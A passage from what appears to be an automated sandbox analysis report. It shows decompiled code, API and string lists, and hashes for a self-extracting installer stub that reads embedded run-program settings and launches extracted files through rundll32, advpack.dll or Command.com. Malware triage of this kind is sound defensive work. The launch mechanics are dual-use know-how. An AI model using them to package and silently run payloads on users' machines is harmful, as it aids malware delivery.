											_pop(_t128);
											return E00EB6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00EB3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xeb8580;
													if( *0xeb8580 != 0) {
														E00EB2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xeb8180;
											if( *0xeb8180 == 0) {
												_t146 = 0x4c7;
												E00EB44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xeb9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xeb9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00EB6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00EB44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xeb9124 = E00EB6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00EB44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xeb8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xeb9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xeb8a38 & 0x0000ffff;
											_v380 = 0xeb9154;
											_v376 = _t151;
											_v372 = 0xeb91e4;
											_v360 = _t97;
											if( *0xeb8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xeb9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xeb8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xeb9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xeba288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xeb9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xeb9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xeb8a20;
										if( *0xeb8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00EB202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00EB468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xeb8c42;
									if( *0xeb8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xeb8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00EB468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00EB468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00EB1781( &_v276, 0x104, _t130, 0xeb8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00EB468F(_t130, 0xeb9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00eb3baa
0x00eb3bb0
0x00eb3bb7
0x00eb3bc0
0x00eb3bc2
0x00eb3bc9
0x00eb3bcb
0x00eb3bcf
0x00eb3bd3
0x00eb3bd9
0x00eb3bfd
0x00eb3bfd
0x00eb3bff
0x00eb3c03
0x00eb3c03
0x00eb3c11
0x00eb3c16
0x00eb3c19
0x00eb3c28
0x00000000
0x00000000
0x00eb3c30
0x00eb3c39
0x00eb3c40
0x00eb3d13
0x00eb3d15
0x00eb3d21
0x00eb3d26
0x00000000
0x00eb3c4f
0x00eb3c56
0x00eb3c60
0x00eb3c65
0x00eb3c77
0x00eb3c78
0x00eb3c7c
0x00eb3c7e
0x00eb3c82
0x00eb3c82
0x00000000
0x00eb3c7c
0x00eb3c67
0x00eb3c69
0x00eb3c6d
0x00000000
0x00eb3c58
0x00eb3c58
0x00eb3c6e
0x00eb3c6e
0x00eb3c87
0x00eb3c89
0x00eb3d4d
0x00eb3d4f
0x00eb3d50
0x00eb3d52
0x00eb3d9e
0x00eb3da8
0x00eb3daf
0x00eb3db4
0x00eb3db6
0x00eb3f4d
0x00eb3f4d
0x00eb3f4f
0x00eb3f56
0x00eb3f57
0x00eb3f58
0x00eb3f63
0x00eb3f63
0x00eb3dbc
0x00eb3dc0
0x00eb3dc2
0x00eb3de6
0x00eb3de6
0x00eb3de8
0x00eb3f0b
0x00eb3f0b
0x00eb3f0f
0x00eb3f13
0x00eb3f15
0x00eb3f1a
0x00eb3f1c
0x00eb3f46
0x00eb3f47
0x00000000
0x00eb3f47
0x00eb3f1e
0x00eb3f1f
0x00eb3f25
0x00eb3f26
0x00eb3f2a
0x00eb3f2d
0x00eb3fd9
0x00eb3fd9
0x00eb3fda
0x00eb3fda
0x00eb3fe1
0x00eb3fe3
0x00eb3fe3
0x00eb3fe8
0x00000000
0x00eb3fe8
0x00eb3f33
0x00eb3f37
0x00000000
0x00eb3f37
0x00eb3dee
0x00eb3dee
0x00eb3df5
0x00eb3fad
0x00eb3fb9
0x00eb3fc2
0x00eb3fc8
0x00000000
0x00eb3fc8
0x00eb3dfb
0x00eb3dfd
0x00000000
0x00000000
0x00eb3e03
0x00eb3e0a
0x00000000
0x00000000
0x00eb3e15
0x00eb3e17
0x00eb3e19
0x00eb3f94
0x00eb3fa4
0x00eb3f7c
0x00eb3f80
0x00eb3f8b
0x00000000
0x00eb3f8b
0x00eb3e2c
0x00eb3e30
0x00eb3e34
0x00eb3e36
0x00eb3f69
0x00eb3f6e
0x00eb3f70
0x00eb3f76
0x00000000
0x00eb3f76
0x00eb3e3c
0x00eb3e43
0x00eb3e47
0x00eb3e52
0x00eb3e56
0x00eb3e5c
0x00eb3e61
0x00eb3e68
0x00eb3e70
0x00eb3e74
0x00eb3e7c
0x00eb3e80
0x00eb3e82
0x00eb3e82
0x00eb3e87
0x00eb3e87
0x00eb3e8b
0x00eb3e91
0x00eb3e94
0x00eb3e96
0x00eb3e96
0x00eb3e9b
0x00eb3e9b
0x00eb3e9f
0x00eb3ea2
0x00eb3ea4
0x00eb3ea4
0x00eb3ea9
0x00eb3ea9
0x00eb3ead
0x00eb3eb3
0x00eb3eb6
0x00eb3eb8
0x00eb3eb8
0x00eb3ebd
0x00eb3ebd
0x00eb3ec1
0x00eb3ec3
0x00eb3ec5
0x00eb3ec5
0x00eb3eca
0x00eb3eca
0x00eb3ece
0x00eb3ed5
0x00eb3ed9
0x00eb3ee0
0x00eb3ee6
0x00eb3eea
0x00eb3eec
0x00eb3eee
0x00eb3ef3
0x00eb3ef3
0x00eb3ef5
0x00eb3efa
0x00eb3efb
0x00eb3efd
0x00eb3f40
0x00000000
0x00eb3eff
0x00eb3eff
0x00eb3f05
0x00000000
0x00eb3f05
0x00eb3efd
0x00eb3dc7
0x00eb3dce
0x00000000
0x00000000
0x00eb3dd0
0x00eb3dd7
0x00000000
0x00000000
0x00eb3dd9
0x00eb3ddb
0x00000000
0x00000000
0x00eb3ddd
0x00eb3de1
0x00000000
0x00eb3de1
0x00eb3d59
0x00eb3d65
0x00eb3d6a
0x00eb3d6c
0x00000000
0x00000000
0x00eb3d6e
0x00eb3d75
0x00000000
0x00000000
0x00eb3d8f
0x00eb3d96
0x00eb3d98
0x00000000
0x00000000
0x00000000
0x00eb3d98
0x00eb3c8f
0x00eb3c98
0x00eb3cf1
0x00eb3cf3
0x00000000
0x00000000
0x00eb3cfe
0x00eb3d11
0x00000000
0x00000000
0x00000000
0x00eb3d11
0x00eb3c9c
0x00eb3ca5
0x00eb3ca7
0x00000000
0x00000000
0x00eb3cad
0x00eb3cb2
0x00eb3cb7
0x00eb3cc5
0x00000000
0x00000000
0x00eb3ce8
0x00eb3cec
0x00eb3ced
0x00eb3ced
0x00000000
0x00eb3ce8
0x00eb3c9e
0x00000000
0x00eb3c9e
0x00eb3c56
0x00eb3d35
0x00eb3d35
0x00eb3d3c
0x00eb3d48
0x00000000
0x00eb3d48
0x00eb3c03
0x00eb3be2
0x00eb3be7
0x00eb3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00EB3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00EB3CDC

Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00EB8C42), ref: 00EB3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00EB3E26
FreeLibrary.KERNEL32(00000000,?,00EB8C42), ref: 00EB3EFF
LocalFree.KERNEL32(?,?,?,?,00EB8C42), ref: 00EB3F1F
FreeLibrary.KERNEL32(00000000,?,00EB8C42), ref: 00EB3F40
LocalFree.KERNEL32(?,?,?,?,00EB8C42), ref: 00EB3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00EB8C42), ref: 00EB3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00EB8C42), ref: 00EB3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00EB8C42), ref: 00EB3FC2

Strings

USRQCMD, xrefs: 00EB3CAD
D, xrefs: 00EB3C19
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB3E74
ADMQCMD, xrefs: 00EB3C9E
DoInfInstall, xrefs: 00EB3E1F, 00EB3E24, 00EB3F68
REBOOT, xrefs: 00EB3BE2
lenta, xrefs: 00EB3E68
POSTRUNPROGRAM, xrefs: 00EB3D60
RUNPROGRAM, xrefs: 00EB3D05
<None>, xrefs: 00EB3CC9, 00EB3D7D
SHOWWINDOW, xrefs: 00EB3C34
advpack.dll, xrefs: 00EB3F9D

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
API String ID: 1032054927-3602275733
Opcode ID: b05e09904c48b77eb10ee8b7d70e043d0044c19939cdde34bada974f47bb8b54
Instruction ID: 9fa9ba203f62364d435825b594cb57dc5275fd44d0181628ae9291b71d445f24
Opcode Fuzzy Hash: b05e09904c48b77eb10ee8b7d70e043d0044c19939cdde34bada974f47bb8b54
Instruction Fuzzy Hash: 3FB1E5706083019FD7209F7599467EBB7E4EB84714F102A2EFA95F62E1DB70C948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EB1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00EB1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xeb8004; // 0x92ae1240
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00EB1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00EB1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00EB1781( &_v268, 0x104, _t111, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
					E00EB658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00EB1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00EB66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00EB66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00EB1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00EB1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00EB16B3( &_v1552, 0x400, " ");
										E00EB16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00EB2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00EB171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00EB1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00EB1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00EB44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xeb9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xeb1140, _t156, 8,  &_v268) == 0) {
										 *0xeb9a34 =  *0xeb9a34 & 0xfffffffb;
										if( *0xeb9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00EB171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xeb9a34 =  *0xeb9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00EB1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00EB1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00EB6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00eb1af3
0x00eb1afa
0x00eb1b07
0x00eb1b09
0x00eb1b1a
0x00eb1b20
0x00eb1b2c
0x00eb1b3b
0x00eb1b40
0x00eb1b2e
0x00eb1b2e
0x00eb1b33
0x00eb1b33
0x00eb1b46
0x00eb1b4c
0x00eb1b52
0x00eb1b57
0x00eb1b5d
0x00eb1b61
0x00eb1b9f
0x00eb1b9f
0x00eb1bb1
0x00eb1bc2
0x00000000
0x00eb1b63
0x00eb1b63
0x00eb1b65
0x00eb1b68
0x00eb1b68
0x00eb1b6a
0x00eb1b6b
0x00eb1b6f
0x00eb1b74
0x00000000
0x00000000
0x00eb1b76
0x00eb1b7b
0x00eb1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb1b8c
0x00eb1b8c
0x00eb1b98
0x00eb1bc7
0x00eb1bc9
0x00eb1bcc
0x00eb1bd3
0x00eb1d75
0x00eb1d76
0x00eb1d78
0x00eb1d7f
0x00eb1e05
0x00eb1e09
0x00000000
0x00000000
0x00eb1e12
0x00eb1e1b
0x00eb1e73
0x00eb1e21
0x00eb1e21
0x00eb1e28
0x00eb1e37
0x00eb1e3e
0x00eb1e52
0x00eb1e60
0x00eb1e60
0x00eb1e3e
0x00eb1e79
0x00eb1e7b
0x00eb1e84
0x00000000
0x00eb1d9b
0x00eb1d9b
0x00eb1da0
0x00eb1da2
0x00eb1da5
0x00eb1da5
0x00eb1da7
0x00eb1da8
0x00eb1dac
0x00eb1dae
0x00eb1db4
0x00eb1db7
0x00eb1db7
0x00eb1db9
0x00eb1dba
0x00eb1dbe
0x00eb1dc3
0x00eb1dce
0x00eb1dd2
0x00eb1deb
0x00000000
0x00eb1df0
0x00000000
0x00eb1dd2
0x00eb1bf7
0x00eb1bfe
0x00eb1c07
0x00eb1d55
0x00eb1d5a
0x00eb1d5b
0x00eb1d5d
0x00eb1d5e
0x00000000
0x00eb1c1b
0x00eb1c1b
0x00eb1c20
0x00eb1c2c
0x00eb1c33
0x00eb1c38
0x00eb1c3a
0x00eb1c3a
0x00eb1c40
0x00eb1c4b
0x00eb1c4b
0x00eb1c5d
0x00eb1c61
0x00eb1dd4
0x00eb1dd4
0x00eb1dd6
0x00eb1ddb
0x00eb1ddc
0x00eb1dde
0x00eb1d64
0x00eb1d64
0x00eb1d67
0x00eb1d6c
0x00000000
0x00eb1c67
0x00eb1c67
0x00eb1c6d
0x00eb1c72
0x00eb1c74
0x00eb1c74
0x00eb1c8e
0x00eb1c99
0x00eb1cc0
0x00eb1cf8
0x00eb1d07
0x00eb1d23
0x00eb1d09
0x00eb1d14
0x00eb1d1b
0x00eb1d1b
0x00eb1d2b
0x00eb1d2d
0x00eb1d2d
0x00eb1d38
0x00eb1d39
0x00eb1d46
0x00eb1cc2
0x00eb1cc2
0x00eb1ccc
0x00eb1cce
0x00eb1cce
0x00eb1cdb
0x00eb1ce6
0x00eb1cee
0x00eb1cee
0x00eb1e89
0x00eb1e91
0x00eb1e92
0x00eb1e94
0x00eb1e97
0x00eb1ea4
0x00eb1ea4
0x00eb1c61
0x00eb1c07
0x00eb1bd3
0x00eb1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00EB1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00EB1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00EB1C57
GetPrivateProfileIntA.KERNEL32 ref: 00EB1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00EB1140,00000000,00000008,?), ref: 00EB1CB8
GetShortPathNameA.KERNEL32 ref: 00EB1D1B

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Strings

Version, xrefs: 00EB1CB3
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB1BA0
Reboot, xrefs: 00EB1C82
", xrefs: 00EB1B25
.BAT, xrefs: 00EB1D83
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00EB1D3B
AdvancedINF, xrefs: 00EB1CAE
DefaultInstall, xrefs: 00EB1C74, 00EB1C87, 00EB1CCE, 00EB1CD3, 00EB1D2D, 00EB1D39
.INF, xrefs: 00EB1BDB
Command.com /c %s, xrefs: 00EB1D9B, 00EB1DE8
setupx.dll, xrefs: 00EB1D14
setupapi.dll, xrefs: 00EB1D23, 00EB1D3A

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-3060569371
Opcode ID: eff5a87808329892c1418b358d6c705e00f492cd9506109e4633a71f1e015207
Instruction ID: 8da6abc25dd2898e4161c24d25b0b2db092e1f0407199c57abf5dd9638eac3fd
Opcode Fuzzy Hash: eff5a87808329892c1418b358d6c705e00f492cd9506109e4633a71f1e015207
Instruction Fuzzy Hash: 4AA14B70A003146FEF219B28CC65BEB77A9DB81334F9412E5E555B32D1DBB09E89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EB597D Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00EB597D(CHAR* __ecx, signed char __edx, void* __edi, char _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xeb8004; // 0x92ae1240
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xeb9124 = E00EB6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00EB44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
